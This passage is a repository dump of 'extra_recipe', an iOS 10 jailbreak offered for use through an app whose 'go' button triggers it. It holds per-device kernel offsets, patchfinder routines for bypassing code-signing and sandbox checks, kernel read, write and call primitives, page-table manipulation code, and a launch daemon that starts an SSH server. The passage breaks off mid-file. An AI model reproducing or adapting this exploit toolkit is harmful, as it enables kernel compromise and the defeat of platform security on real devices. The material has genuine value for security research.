4 | // 5 | // Created by Ian Beer on 1/23/17. 6 | // Copyright © 2017 Ian Beer. All rights reserved. 7 | // 8 | 9 | import UIKit 10 | 11 | class ViewController: UIViewController { 12 | 13 | override func viewDidLoad() { 14 | super.viewDidLoad() 15 | //DispatchQueue.main.async(execute: { () -> Void in 16 | // jb_go(); 17 | //}) 18 | } 19 | 20 | 21 | override func didReceiveMemoryWarning() { 22 | super.didReceiveMemoryWarning() 23 | // Dispose of any resources that can be recreated. 
24 | } 25 | 26 | @IBAction func bang(_ sender: UIButton) { 27 | var status: String 28 | switch jb_go() { 29 | case 0: 30 | status = "jailbroken" 31 | case 1: 32 | status = "internal error" 33 | case 2: 34 | status = "unsupported" 35 | case 3: 36 | status = "unsupported yet" 37 | case 42: 38 | status = "hmm... ok" 39 | default: 40 | status = "failed, reboot" 41 | } 42 | sender.isEnabled = false 43 | sender.setTitle(status, for: .disabled) 44 | } 45 | 46 | } 47 | 48 | -------------------------------------------------------------------------------- /extra_recipe/extra_recipe-cydia/extra_recipe/bootstrap.tar: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/externalist/exploit_playground/787d50ee0ccb57c4207c2b41072486c081fef733/extra_recipe/extra_recipe-cydia/extra_recipe/bootstrap.tar -------------------------------------------------------------------------------- /extra_recipe/extra_recipe-cydia/extra_recipe/def.plist: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/externalist/exploit_playground/787d50ee0ccb57c4207c2b41072486c081fef733/extra_recipe/extra_recipe-cydia/extra_recipe/def.plist -------------------------------------------------------------------------------- /extra_recipe/extra_recipe-cydia/extra_recipe/dex.plist: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | hw 7 | 8 | iPhone9,1 9 | iPhone9,2 10 | iPhone9,3 11 | iPhone9,4 12 | 13 | ios 14 | 15 | 10.1 16 | 10.1.1 17 | 18 | nports 19 | 40000 20 | offsets 21 | 22 | 23 | 0xfffffff006f83d38 24 | 25 | 0xfffffff00747ad9c 26 | 27 | 0xfffffff0074916b4 28 | 29 | 0xfffffff00749ca6c 30 | 31 | 0xfffffff0075f0178 32 | 33 | 0xfffffff00757c898 34 | 35 | 0xfffffff006337e10 36 | 37 | 38 | 39 | hw 40 | 41 | iPhone9,1 42 | iPhone9,2 43 | iPhone9,3 44 | iPhone9,4 45 | 46 | ios 47 | 48 | 10.0.1 49 | 10.0.2 50 | 10.0.3 51 | 52 | nports 53 
| 40000 54 | offsets 55 | 56 | 0xfffffff006f83b78 57 | 0xfffffff007479938 58 | 0xfffffff007490240 59 | 0xfffffff00749b5f8 60 | 0xfffffff0075f0178 61 | 0xfffffff00757c898 62 | 0xfffffff00633fe10 63 | 64 | 65 | 66 | hw 67 | 68 | iPhone7,2 69 | 70 | ios 71 | 72 | 10.2 73 | 74 | nports 75 | 15000 76 | offsets 77 | 78 | 0xfffffff006f9b450 79 | 0xfffffff0074446dc 80 | 0xfffffff00745b0dc 81 | 0xfffffff0074664f8 82 | 0xfffffff0075bc468 83 | 0xfffffff007548a98 84 | 0xfffffff006413e10 85 | 86 | 87 | 88 | hw 89 | 90 | iPad4,7 91 | 92 | ios 93 | 94 | 10.2 95 | 96 | nports 97 | 40000 98 | offsets 99 | 100 | 0xfffffff006fafa10 101 | 0xfffffff00743844c 102 | 0xfffffff00744ee4c 103 | 0xfffffff00745a268 104 | 0xfffffff0075b0418 105 | 0xfffffff00753ca98 106 | 0xfffffff00641be10 107 | 108 | 109 | 110 | hw 111 | 112 | iPad5,3 113 | iPad5,4 114 | 115 | ios 116 | 117 | 10.2 118 | 119 | nports 120 | 40000 121 | offsets 122 | 123 | 0xfffffff006f85310 124 | 0xfffffff007444900 125 | 0xfffffff00745b300 126 | 0xfffffff00746671c 127 | 0xfffffff0075bc528 128 | 0xfffffff007548a98 129 | 0xfffffff0063bfe10 130 | 131 | 132 | 133 | hw 134 | 135 | iPhone8,1 136 | iPhone8,2 137 | 138 | ios 139 | 140 | 10.2 141 | 142 | nports 143 | 40000 144 | offsets 145 | 146 | 0xfffffff006f9b950 147 | 0xfffffff00743755c 148 | 0xfffffff00744df5c 149 | 0xfffffff007459378 150 | 0xfffffff0075ac438 151 | 0xfffffff007538a98 152 | 0xfffffff0063cfe10 153 | 154 | 155 | 156 | 157 | -------------------------------------------------------------------------------- /extra_recipe/extra_recipe-cydia/extra_recipe/dropbear.plist: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | Label 6 | ShaiHulud 7 | Program 8 | /usr/local/bin/dropbear 9 | ProgramArguments 10 | 11 | /usr/local/bin/dropbear 12 | -F 13 | -R 14 | -p 15 | 127.0.0.1:22 16 | 17 | RunAtLoad 18 | 19 | KeepAlive 20 | 21 | 22 | 23 | -------------------------------------------------------------------------------- 
/extra_recipe/extra_recipe-cydia/extra_recipe/extra_recipe-Bridging-Header.h: -------------------------------------------------------------------------------- 1 | // 2 | // Use this file to import your target's public headers that you would like to expose to Swift. 3 | // 4 | 5 | int jb_go(); 6 | -------------------------------------------------------------------------------- /extra_recipe/extra_recipe-cydia/extra_recipe/launchctl: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/externalist/exploit_playground/787d50ee0ccb57c4207c2b41072486c081fef733/extra_recipe/extra_recipe-cydia/extra_recipe/launchctl -------------------------------------------------------------------------------- /extra_recipe/extra_recipe-cydia/extra_recipe/load_regs_and_crash.s: -------------------------------------------------------------------------------- 1 | .text 2 | .globl _load_regs_and_crash 3 | .align 2 4 | _load_regs_and_crash: 5 | mov x30, x0 6 | ldp x0, x1, [x30, 0] 7 | ldp x2, x3, [x30, 0x10] 8 | ldp x4, x5, [x30, 0x20] 9 | ldp x6, x7, [x30, 0x30] 10 | ldp x8, x9, [x30, 0x40] 11 | ldp x10, x11, [x30, 0x50] 12 | ldp x12, x13, [x30, 0x60] 13 | ldp x14, x15, [x30, 0x70] 14 | ldp x16, x17, [x30, 0x80] 15 | ldp x18, x19, [x30, 0x90] 16 | ldp x20, x21, [x30, 0xa0] 17 | ldp x22, x23, [x30, 0xb0] 18 | ldp x24, x25, [x30, 0xc0] 19 | ldp x26, x27, [x30, 0xd0] 20 | ldp x28, x29, [x30, 0xe0] 21 | brk 0 22 | .align 3 23 | -------------------------------------------------------------------------------- /extra_recipe/extra_recipe-cydia/extra_recipe/mach-portal.dylib: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/externalist/exploit_playground/787d50ee0ccb57c4207c2b41072486c081fef733/extra_recipe/extra_recipe-cydia/extra_recipe/mach-portal.dylib -------------------------------------------------------------------------------- 
/extra_recipe/extra_recipe-cydia/extra_recipe/mach_portal.dylib: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/externalist/exploit_playground/787d50ee0ccb57c4207c2b41072486c081fef733/extra_recipe/extra_recipe-cydia/extra_recipe/mach_portal.dylib -------------------------------------------------------------------------------- /extra_recipe/extra_recipe-cydia/extra_recipe/offsets.h: -------------------------------------------------------------------------------- 1 | // 2 | // offsets.h 3 | // extra_recipe 4 | // 5 | // Created by xerub on 28/05/2017. 6 | // Copyright © 2017 xerub. All rights reserved. 7 | // 8 | 9 | #ifndef offsets_h 10 | #define offsets_h 11 | 12 | enum { 13 | ERR_NOERR = 0, 14 | ERR_INTERNAL = 1, 15 | ERR_UNSUPPORTED = 2, 16 | ERR_UNSUPPORTED_YET = 3, 17 | }; 18 | 19 | extern unsigned offsetof_p_pid; 20 | extern unsigned offsetof_task; 21 | extern unsigned offsetof_p_ucred; 22 | extern unsigned offsetof_p_csflags; 23 | extern unsigned offsetof_itk_self; 24 | extern unsigned offsetof_itk_sself; 25 | extern unsigned offsetof_itk_bootstrap; 26 | extern unsigned offsetof_ip_mscount; 27 | extern unsigned offsetof_ip_srights; 28 | extern unsigned offsetof_special; 29 | 30 | extern const char *mp; 31 | 32 | extern uint64_t AGXCommandQueue_vtable; 33 | extern uint64_t OSData_getMetaClass; // +8 == ret 34 | extern uint64_t OSSerializer_serialize; 35 | extern uint64_t k_uuid_copy; 36 | 37 | extern uint64_t allproc; 38 | extern uint64_t realhost; 39 | extern uint64_t call5; 40 | 41 | extern int nports; 42 | 43 | int init_offsets(void); 44 | uint64_t constget(int idx); 45 | 46 | #endif /* offsets_h */ 47 | -------------------------------------------------------------------------------- /extra_recipe/extra_recipe-cydia/extra_recipe/offsets.m: -------------------------------------------------------------------------------- 1 | // 2 | // offsets.m 3 | // extra_recipe 4 | // 5 | // Created by 
xerub on 28/05/2017. 6 | // Copyright © 2017 xerub. All rights reserved. 7 | // 8 | 9 | #include 10 | #include 11 | 12 | #include "offsets.h" 13 | 14 | unsigned offsetof_p_pid = 0x10; // proc_t::p_pid 15 | unsigned offsetof_task = 0x18; // proc_t::task 16 | unsigned offsetof_p_ucred = 0x100; // proc_t::p_ucred 17 | unsigned offsetof_p_csflags = 0x2a8; // proc_t::p_csflags 18 | unsigned offsetof_itk_self = 0xD8; // task_t::itk_self (convert_task_to_port) 19 | unsigned offsetof_itk_sself = 0xE8; // task_t::itk_sself (task_get_special_port) 20 | unsigned offsetof_itk_bootstrap = 0x2b8; // task_t::itk_bootstrap (task_get_special_port) 21 | unsigned offsetof_ip_mscount = 0x9C; // ipc_port_t::ip_mscount (ipc_port_make_send) 22 | unsigned offsetof_ip_srights = 0xA0; // ipc_port_t::ip_srights (ipc_port_make_send) 23 | unsigned offsetof_special = 2 * sizeof(long); // host::special 24 | 25 | const char *mp = NULL; 26 | 27 | uint64_t AGXCommandQueue_vtable = 0; 28 | uint64_t OSData_getMetaClass = 0; 29 | uint64_t OSSerializer_serialize = 0; 30 | uint64_t k_uuid_copy = 0; 31 | 32 | uint64_t allproc = 0; 33 | uint64_t realhost = 0; 34 | uint64_t call5 = 0; 35 | 36 | int nports = 40000; 37 | 38 | static NSMutableArray *consttable = nil; 39 | static NSMutableArray *collide = nil; 40 | 41 | static int 42 | constload(void) 43 | { 44 | struct utsname uts; 45 | uname(&uts); 46 | if (strstr(uts.version, "Marijuan")) { 47 | return -2; 48 | } 49 | 50 | NSString *strv = [NSString stringWithUTF8String:uts.version]; 51 | NSArray *dp =[[NSArray alloc] initWithContentsOfFile: [[NSBundle mainBundle] pathForResource: @"def" ofType:@"plist"]]; 52 | int m = 0; 53 | collide = [NSMutableArray new]; 54 | 55 | for (NSDictionary *dict in dp) { 56 | if ([dict[@"vers"] isEqualToString:strv]) { 57 | [collide setObject:[NSMutableArray new] atIndexedSubscript:m]; 58 | int i = 0; 59 | for (NSString *str in dict[@"val"]) { 60 | [collide[m] setObject:[NSNumber numberWithUnsignedLongLong:strtoull([str 
UTF8String], 0, 0)] atIndexedSubscript:i]; 61 | i++; 62 | } 63 | m++; 64 | } 65 | } 66 | if (m) { 67 | return 0; 68 | } 69 | return -1; 70 | } 71 | 72 | static char 73 | affine_const_by_surfacevt(uint64_t surfacevt_slid) 74 | { 75 | for (NSArray *arr in collide) { 76 | if ((surfacevt_slid & 0xfffff) == ([[arr objectAtIndex:1] unsignedLongLongValue] & 0xfffff)) { 77 | NSLog(@"affined"); 78 | consttable = arr; 79 | return 0; 80 | } 81 | } 82 | return -1; 83 | } 84 | 85 | uint64_t 86 | constget(int idx) 87 | { 88 | return [[consttable objectAtIndex:idx] unsignedLongLongValue]; 89 | } 90 | 91 | static int 92 | offload(const char *hw, NSString *ios) 93 | { 94 | NSArray *dp = [[NSArray alloc] initWithContentsOfFile: [[NSBundle mainBundle] pathForResource: @"dex" ofType:@"plist"]]; 95 | for (NSDictionary *dict in dp) { 96 | NSArray *hw_array = dict[@"hw"]; 97 | for (NSString *h in hw_array) { 98 | if (!strcmp([h UTF8String], hw)) { 99 | NSArray *ios_array = dict[@"ios"]; 100 | for (NSString *i in ios_array) { 101 | if ([ios compare:i] == NSOrderedSame) { 102 | NSArray *a = dict[@"offsets"]; 103 | AGXCommandQueue_vtable = strtoull([[a objectAtIndex:0] UTF8String], NULL, 0); 104 | OSData_getMetaClass = strtoull([[a objectAtIndex:1] UTF8String], NULL, 0); 105 | OSSerializer_serialize = strtoull([[a objectAtIndex:2] UTF8String], NULL, 0); 106 | k_uuid_copy = strtoull([[a objectAtIndex:3] UTF8String], NULL, 0); 107 | allproc = strtoull([[a objectAtIndex:4] UTF8String], NULL, 0); 108 | realhost = strtoull([[a objectAtIndex:5] UTF8String], NULL, 0); 109 | call5 = strtoull([[a objectAtIndex:6] UTF8String], NULL, 0); 110 | nports = [dict[@"nports"] intValue]; 111 | return 0; 112 | } 113 | } 114 | } 115 | } 116 | } 117 | return -1; 118 | } 119 | 120 | int 121 | init_offsets(void) 122 | { 123 | struct utsname uts; 124 | 125 | if (uname(&uts)) { 126 | return ERR_INTERNAL; 127 | } 128 | 129 | NSString *version = [[UIDevice currentDevice] systemVersion]; 130 | if ([version 
compare:@"10.0" options:NSNumericSearch] == NSOrderedAscending || 131 | [version compare:@"10.2" options:NSNumericSearch] == NSOrderedDescending) { 132 | return ERR_UNSUPPORTED; 133 | } 134 | 135 | if (!strncmp(uts.machine, "iPhone9,", sizeof("iPhone9"))) { 136 | // iPhone 7 (plus) 137 | if (constload() || affine_const_by_surfacevt(0xfffffff006e521e0)) { 138 | return ERR_INTERNAL; 139 | } 140 | if ([version compare:@"10.1" options:NSNumericSearch] == NSOrderedAscending) { 141 | // 10.0[.x] 142 | mp = "@executable_path/mach-portal.dylib"; 143 | } else { 144 | // 10.1[.x] 145 | mp = "@executable_path/mach_portal.dylib"; 146 | } 147 | } 148 | 149 | if (offload(uts.machine, version) || !AGXCommandQueue_vtable) { 150 | return ERR_UNSUPPORTED_YET; 151 | } 152 | 153 | return 0; 154 | } 155 | -------------------------------------------------------------------------------- /extra_recipe/extra_recipe-cydia/extra_recipe/patchfinder64.h: -------------------------------------------------------------------------------- 1 | #ifndef PATCHFINDER64_H_ 2 | #define PATCHFINDER64_H_ 3 | 4 | int init_kernel(uint64_t base, const char *filename); 5 | void term_kernel(void); 6 | 7 | enum { SearchInCore, SearchInPrelink }; 8 | 9 | uint64_t find_register_value(uint64_t where, int reg); 10 | uint64_t find_reference(uint64_t to, int n, int prelink); 11 | uint64_t find_strref(const char *string, int n, int prelink); 12 | uint64_t find_gPhysBase(void); 13 | uint64_t find_kernel_pmap(void); 14 | uint64_t find_amfiret(void); 15 | uint64_t find_ret_0(void); 16 | uint64_t find_amfi_memcmpstub(void); 17 | uint64_t find_sbops(void); 18 | uint64_t find_lwvm_mapio_patch(void); 19 | uint64_t find_lwvm_mapio_newj(void); 20 | 21 | uint64_t find_entry(void); 22 | const unsigned char *find_mh(void); 23 | 24 | uint64_t find_cpacr_write(void); 25 | uint64_t find_str(const char *string); 26 | uint64_t find_amfiops(void); 27 | uint64_t find_sysbootnonce(void); 28 | 29 | #endif 30 | 
-------------------------------------------------------------------------------- /extra_recipe/extra_recipe-cydia/extra_recipe/pte_stuff.h: -------------------------------------------------------------------------------- 1 | #ifndef pte_stuff_h 2 | #define pte_stuff_h 3 | 4 | 5 | #define TTE_INDEX_SHIFT 3 6 | #define TTE_SIZE (1 << TTE_INDEX_SHIFT) 7 | #define TTE_INDEX(vma, level) ((vma.vm_info.level ## _index) << TTE_INDEX_SHIFT) 8 | #define TTE_GET(tte, mask) (tte & mask) 9 | #define TTE_SETB(tte, mask) tte = tte | mask 10 | #define TTE_SET(tte, mask, val) tte = ((tte & (~mask)) | (val & mask)) 11 | #define TTE_IS_VALID_MASK 0x1 12 | #define TTE_IS_TABLE_MASK 0x2 13 | #define TTE_BLOCK_ATTR_INDEX_MASK 0x1C 14 | #define TTE_BLOCK_ATTR_NS_MASK 0x20 15 | #define TTE_BLOCK_ATTR_AP_MASK 0xC0 16 | #define TTE_BLOCK_ATTR_AP_RO_MASK 0x80 17 | #define TTE_BLOCK_ATTR_AP_CAN_EL0_ACCESS_MASK 0x40 18 | #define TTE_BLOCK_ATTR_SH_MASK 0x300 19 | #define TTE_BLOCK_ATTR_AF_MASK 0x400 20 | #define TTE_BLOCK_ATTR_NG_MASK 0x800 21 | #define TTE_PHYS_VALUE_MASK 0xFFFFFFFFF000ULL 22 | #define TTE_BLOCK_ATTR_CONTIG_MASK (1ULL << 52) 23 | #define TTE_BLOCK_ATTR_PXN_MASK (1ULL << 53) 24 | #define TTE_BLOCK_ATTR_UXN_MASK (1ULL << 54) 25 | #define VIRT_TO_PHYS(vaddr) (vaddr - gVirtBase + gPhysBase) 26 | #define PHYS_TO_VIRT(paddr) (paddr - gPhysBase + gVirtBase) 27 | uint64_t gPhysBase,gVirtBase,pmap_store,level1_table,hibit_guess; 28 | 29 | typedef union VMA_4K { 30 | struct { 31 | uint64_t block_off : 12; 32 | uint64_t level3_index : 9; 33 | uint64_t level2_index : 9; 34 | uint64_t level1_index : 9; 35 | uint64_t level0_index : 9; 36 | uint64_t ttbr_selector : 16; 37 | } __attribute__((packed)) vm_info; 38 | uint64_t vmaddr; 39 | } VMA_4K; 40 | typedef union VMA_16K { 41 | struct { 42 | uint64_t block_off : 14; 43 | uint64_t level3_index : 11; 44 | uint64_t level2_index : 11; 45 | uint64_t level1_index : 11; 46 | uint64_t level0_index : 1; 47 | uint64_t ttbr_selector : 16; 48 | } 
__attribute__((packed)) vm_info; 49 | uint64_t vmaddr; 50 | } VMA_16K; 51 | 52 | VMA_16K vad16; 53 | VMA_4K vad4; 54 | char isvad = 0; 55 | 56 | #define TTELog NSLog 57 | vm_size_t sz = 0; 58 | 59 | void checkvad() { 60 | if (!sz) { 61 | struct utsname u = { 0 }; 62 | uname(&u); 63 | host_page_size(mach_host_self(), &sz); 64 | NSLog(@"checkvad: %x %x", sz, getpagesize()); 65 | if (strstr(u.machine, "iPad5,") == u.machine) { 66 | sz = 4096; // this is 4k but host_page_size lies to us 67 | } 68 | assert(sz); 69 | if (sz == 4096) { 70 | isvad = 1; 71 | } 72 | } 73 | } 74 | void parse_block_tte(uint64_t tte) { 75 | TTELog(@"TTE physaddr: %016llx", TTE_GET(tte, TTE_PHYS_VALUE_MASK)); 76 | TTELog(@"TTE table: %d", !!(TTE_GET(tte, TTE_IS_TABLE_MASK))); 77 | TTELog(@"TTE valid: %d", !!(TTE_GET(tte, TTE_IS_VALID_MASK))); 78 | TTELog(@"TTE userland eXecute Never: %d", !!(TTE_GET(tte, TTE_BLOCK_ATTR_UXN_MASK))); 79 | TTELog(@"TTE privileged eXecute Never: %d", !!(TTE_GET(tte, TTE_BLOCK_ATTR_PXN_MASK))); 80 | TTELog(@"TTE contiguous: %d", !!(TTE_GET(tte, TTE_BLOCK_ATTR_CONTIG_MASK))); 81 | TTELog(@"TTE not global: %d", !!(TTE_GET(tte, TTE_BLOCK_ATTR_NG_MASK))); 82 | TTELog(@"TTE access flag: %d", !!(TTE_GET(tte, TTE_BLOCK_ATTR_AF_MASK))); 83 | TTELog(@"TTE shareable: %01llx", (TTE_GET(tte, TTE_BLOCK_ATTR_SH_MASK) >> 8)); 84 | TTELog(@"TTE access permissions: %s", (TTE_GET(tte, TTE_BLOCK_ATTR_AP_RO_MASK)) ? "Read only" : "Read/Write"); 85 | TTELog(@"TTE access permissions: %s", (TTE_GET(tte, TTE_BLOCK_ATTR_AP_CAN_EL0_ACCESS_MASK)) ? 
"EL0 (Userland) can access this page" : "EL0 (Userland) cannot access this page"); 86 | } 87 | 88 | void pagestuff_64(vm_address_t vmaddr, void (^pagestuff_64_callback)(vm_address_t tte_addr, int addr), vm_address_t table, int level) { 89 | 90 | checkvad(); 91 | if (!table) table = level1_table; 92 | if (!level) level = 1; 93 | 94 | vm_address_t tteaddr = 0; 95 | 96 | 97 | 98 | if (sz == 4096) { 99 | VMA_4K target_addr; 100 | target_addr.vmaddr = vmaddr; 101 | 102 | if (level == 1) { 103 | target_addr.vm_info.level1_index -= 0x1c0; 104 | } 105 | 106 | switch (level) { 107 | case 0: 108 | tteaddr = table + TTE_INDEX(target_addr, level0); 109 | break; 110 | case 1: 111 | tteaddr = table + TTE_INDEX(target_addr, level1); 112 | break; 113 | 114 | case 2: 115 | tteaddr = table + TTE_INDEX(target_addr, level2); 116 | break; 117 | 118 | case 3: 119 | tteaddr = table + TTE_INDEX(target_addr, level3); 120 | break; 121 | 122 | default: 123 | break; 124 | } 125 | 126 | } else if (sz == 4096*4) { 127 | VMA_16K target_addr; 128 | target_addr.vmaddr = vmaddr; 129 | 130 | switch (level) { 131 | case 0: 132 | tteaddr = table + TTE_INDEX(target_addr, level0); 133 | break; 134 | case 1: 135 | tteaddr = table + TTE_INDEX(target_addr, level1); 136 | break; 137 | 138 | case 2: 139 | tteaddr = table + TTE_INDEX(target_addr, level2); 140 | break; 141 | 142 | case 3: 143 | tteaddr = table + TTE_INDEX(target_addr, level3); 144 | break; 145 | 146 | default: 147 | break; 148 | } 149 | 150 | 151 | } 152 | 153 | //parse_block_tte(level1_entry); 154 | 155 | pagestuff_64_callback(tteaddr, level); 156 | 157 | uint64_t level1_entry = ReadAnywhere64(tteaddr); 158 | 159 | if (TTE_GET(level1_entry, TTE_IS_TABLE_MASK) && level != 3) { 160 | pagestuff_64(vmaddr, pagestuff_64_callback, (TTE_GET(level1_entry, TTE_PHYS_VALUE_MASK)) - gPhysBase + gVirtBase, level + 1); 161 | } 162 | } 163 | 164 | uint64_t findphys_real(uint64_t virtaddr) { 165 | __block uint64_t physvar = 0; 166 | pagestuff_64(virtaddr, 
^(vm_address_t tte_addr, int addr) { 167 | uint64_t tte = ReadAnywhere64(tte_addr); 168 | if (addr == 3) {\ 169 | physvar = TTE_GET(tte, TTE_PHYS_VALUE_MASK); 170 | } 171 | }, level1_table, isvad ? 1 : 2); 172 | 173 | return physvar; 174 | 175 | } 176 | uint64_t physalloc(uint64_t size) { 177 | uint64_t ret = 0; 178 | mach_vm_allocate(tfp0, (mach_vm_address_t*) &ret, size, VM_FLAGS_ANYWHERE); 179 | return ret; 180 | } 181 | 182 | #endif 183 | -------------------------------------------------------------------------------- /extra_recipe/extra_recipe-cydia/extra_recipe/reload: -------------------------------------------------------------------------------- 1 | #!/bin/sh 2 | ls /etc/rc.d | while read a; do /etc/rc.d/$a; done 3 | sleep 1 4 | launchctl unload $(ls /System/Library/LaunchDaemons/ | grep -v logd | grep -v fud | grep -v ReportCrash | while read a; do printf /System/Library/LaunchDaemons/$a\ ; done) 5 | launchctl unload /System/Library/NanoLaunchDaemons 6 | sleep 1 7 | launchctl load /Library/LaunchDaemons 8 | launchctl load /System/Library/LaunchDaemons 9 | launchctl load /System/Library/NanoLaunchDaemons 10 | 11 | exit 0 12 | -------------------------------------------------------------------------------- /extra_recipe/extra_recipe-cydia/extra_recipe/tar: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/externalist/exploit_playground/787d50ee0ccb57c4207c2b41072486c081fef733/extra_recipe/extra_recipe-cydia/extra_recipe/tar -------------------------------------------------------------------------------- /extra_recipe/extra_recipe-cydia/extra_recipe/unjail.h: -------------------------------------------------------------------------------- 1 | // 2 | // unjail.h 3 | // extra_recipe 4 | // 5 | // Created by xerub on 16/05/2017. 6 | // Copyright © 2017 xerub. All rights reserved. 
7 | // 8 | 9 | #ifndef unjail_h 10 | #define unjail_h 11 | 12 | #include 13 | #include 14 | #include 15 | #include 16 | #include 17 | #include 18 | #include 19 | #include 20 | #include 21 | #include 22 | #include 23 | 24 | extern mach_port_t tfp0; 25 | extern uint64_t kaslr_shift; 26 | extern uint64_t kernel_base; 27 | 28 | vm_size_t kread(vm_address_t where, uint8_t *p, vm_size_t size); 29 | uint64_t kread_uint64(vm_address_t where); 30 | uint32_t kread_uint32(vm_address_t where); 31 | vm_size_t kwrite(vm_address_t where, const uint8_t *p, vm_size_t size); 32 | vm_size_t kwrite_uint64(vm_address_t where, uint64_t value); 33 | vm_size_t kwrite_uint32(vm_address_t where, uint32_t value); 34 | 35 | void kx2(uint64_t fptr, uint64_t arg1, uint64_t arg2); 36 | uint32_t kx5(uint64_t fptr, uint64_t arg1, uint64_t arg2, uint64_t arg3, uint64_t arg4, uint64_t arg5); 37 | 38 | #endif /* unjail_h */ 39 | -------------------------------------------------------------------------------- /extra_recipe/extra_recipe-master/README.md: -------------------------------------------------------------------------------- 1 | A jailbreak. 2 | 3 | ##### Howto: 4 | 5 | Clean reboot the device, wait for a couple of minutes, start extra_recipe, wait for 5 seconds or so, then hit "go". 6 | If it says "failed, reboot" you should really reboot. Re-trying the same app will most likely encounter a kernel panic somewhere down the road. 7 | 8 | ##### Support: 9 | 10 | | Device | Version | 11 | |---------|----------| 12 | | iPhone 7/+ | iOS 10.0.1 -> iOS 10.1.1 | 13 | | iPhone 6S/+ (TSMC) | iOS 10.2 | 14 | | iPhone SE (TSMC) | iOS 10.2 | 15 | | iPhone 6/+ | iOS 10.1.1 & 10.2 | 16 | | iPhone 5S | iOS 10.0.2, 10.1.1 & 10.2 | 17 | | iPad Air 2 | iOS 10.2 | 18 | | iPad Pro 9.7 | iOS 10.2 | 19 | | iPad Pro 12.9 | iOS 10.2 | 20 | | iPad Air | iOS 10.2 | 21 | | iPad Mini 2 | iOS 10.0.2 & 10.2 | 22 | | iPad Mini 3 | iOS 10.2 | 23 | | iPad Mini 4 | iOS 10.2 | 24 | | iPod Touch 6th Gen. 
| iOS 10.2 | 25 | 26 | ##### Credits: 27 | 28 | * Ian Beer for the amazingly simple, yet awesome, kernel exploit 29 | * @qwertyoruiop for the amazingly complicated, yet effective, memprot bypass 30 | -------------------------------------------------------------------------------- /extra_recipe/extra_recipe-master/extra_recipe.xcodeproj/project.xcworkspace/contents.xcworkspacedata: -------------------------------------------------------------------------------- 1 | 2 | 4 | 6 | 7 | 8 | -------------------------------------------------------------------------------- /extra_recipe/extra_recipe-master/extra_recipe.xcodeproj/project.xcworkspace/xcuserdata/ianbeer.xcuserdatad/UserInterfaceState.xcuserstate: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/externalist/exploit_playground/787d50ee0ccb57c4207c2b41072486c081fef733/extra_recipe/extra_recipe-master/extra_recipe.xcodeproj/project.xcworkspace/xcuserdata/ianbeer.xcuserdatad/UserInterfaceState.xcuserstate -------------------------------------------------------------------------------- /extra_recipe/extra_recipe-master/extra_recipe.xcodeproj/xcuserdata/ianbeer.xcuserdatad/xcschemes/extra_recipe.xcscheme: -------------------------------------------------------------------------------- 1 | 2 | 5 | 8 | 9 | 15 | 21 | 22 | 23 | 24 | 25 | 30 | 31 | 32 | 33 | 39 | 40 | 41 | 42 | 43 | 44 | 54 | 56 | 62 | 63 | 64 | 65 | 66 | 67 | 73 | 75 | 81 | 82 | 83 | 84 | 86 | 87 | 90 | 91 | 92 | -------------------------------------------------------------------------------- /extra_recipe/extra_recipe-master/extra_recipe.xcodeproj/xcuserdata/ianbeer.xcuserdatad/xcschemes/xcschememanagement.plist: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | SchemeUserState 6 | 7 | extra_recipe.xcscheme 8 | 9 | orderHint 10 | 0 11 | 12 | 13 | SuppressBuildableAutocreation 14 | 15 | B0F37BBC1E361EAD00179E85 16 | 17 | primary 18 | 19 | 
20 | 21 | 22 | 23 | -------------------------------------------------------------------------------- /extra_recipe/extra_recipe-master/extra_recipe/AppDelegate.swift: -------------------------------------------------------------------------------- 1 | // 2 | // AppDelegate.swift 3 | // extra_recipe 4 | // 5 | // Created by Ian Beer on 1/23/17. 6 | // Copyright © 2017 Ian Beer. All rights reserved. 7 | // 8 | 9 | import UIKit 10 | 11 | @UIApplicationMain 12 | class AppDelegate: UIResponder, UIApplicationDelegate { 13 | 14 | var window: UIWindow? 15 | 16 | 17 | func application(_ application: UIApplication, didFinishLaunchingWithOptions launchOptions: [UIApplicationLaunchOptionsKey: Any]?) -> Bool { 18 | // Override point for customization after application launch. 19 | return true 20 | } 21 | 22 | func applicationWillResignActive(_ application: UIApplication) { 23 | // Sent when the application is about to move from active to inactive state. This can occur for certain types of temporary interruptions (such as an incoming phone call or SMS message) or when the user quits the application and it begins the transition to the background state. 24 | // Use this method to pause ongoing tasks, disable timers, and invalidate graphics rendering callbacks. Games should use this method to pause the game. 25 | } 26 | 27 | func applicationDidEnterBackground(_ application: UIApplication) { 28 | // Use this method to release shared resources, save user data, invalidate timers, and store enough application state information to restore your application to its current state in case it is terminated later. 29 | // If your application supports background execution, this method is called instead of applicationWillTerminate: when the user quits. 30 | } 31 | 32 | func applicationWillEnterForeground(_ application: UIApplication) { 33 | // Called as part of the transition from the background to the active state; here you can undo many of the changes made on entering the background. 
34 | } 35 | 36 | func applicationDidBecomeActive(_ application: UIApplication) { 37 | // Restart any tasks that were paused (or not yet started) while the application was inactive. If the application was previously in the background, optionally refresh the user interface. 38 | } 39 | 40 | func applicationWillTerminate(_ application: UIApplication) { 41 | // Called when the application is about to terminate. Save data if appropriate. See also applicationDidEnterBackground:. 42 | } 43 | 44 | 45 | } 46 | 47 | -------------------------------------------------------------------------------- /extra_recipe/extra_recipe-master/extra_recipe/Assets.xcassets/AppIcon.appiconset/Contents.json: -------------------------------------------------------------------------------- 1 | { 2 | "images" : [ 3 | { 4 | "idiom" : "iphone", 5 | "size" : "29x29", 6 | "scale" : "2x" 7 | }, 8 | { 9 | "idiom" : "iphone", 10 | "size" : "29x29", 11 | "scale" : "3x" 12 | }, 13 | { 14 | "idiom" : "iphone", 15 | "size" : "40x40", 16 | "scale" : "2x" 17 | }, 18 | { 19 | "idiom" : "iphone", 20 | "size" : "40x40", 21 | "scale" : "3x" 22 | }, 23 | { 24 | "idiom" : "iphone", 25 | "size" : "60x60", 26 | "scale" : "2x" 27 | }, 28 | { 29 | "idiom" : "iphone", 30 | "size" : "60x60", 31 | "scale" : "3x" 32 | }, 33 | { 34 | "idiom" : "ipad", 35 | "size" : "29x29", 36 | "scale" : "1x" 37 | }, 38 | { 39 | "idiom" : "ipad", 40 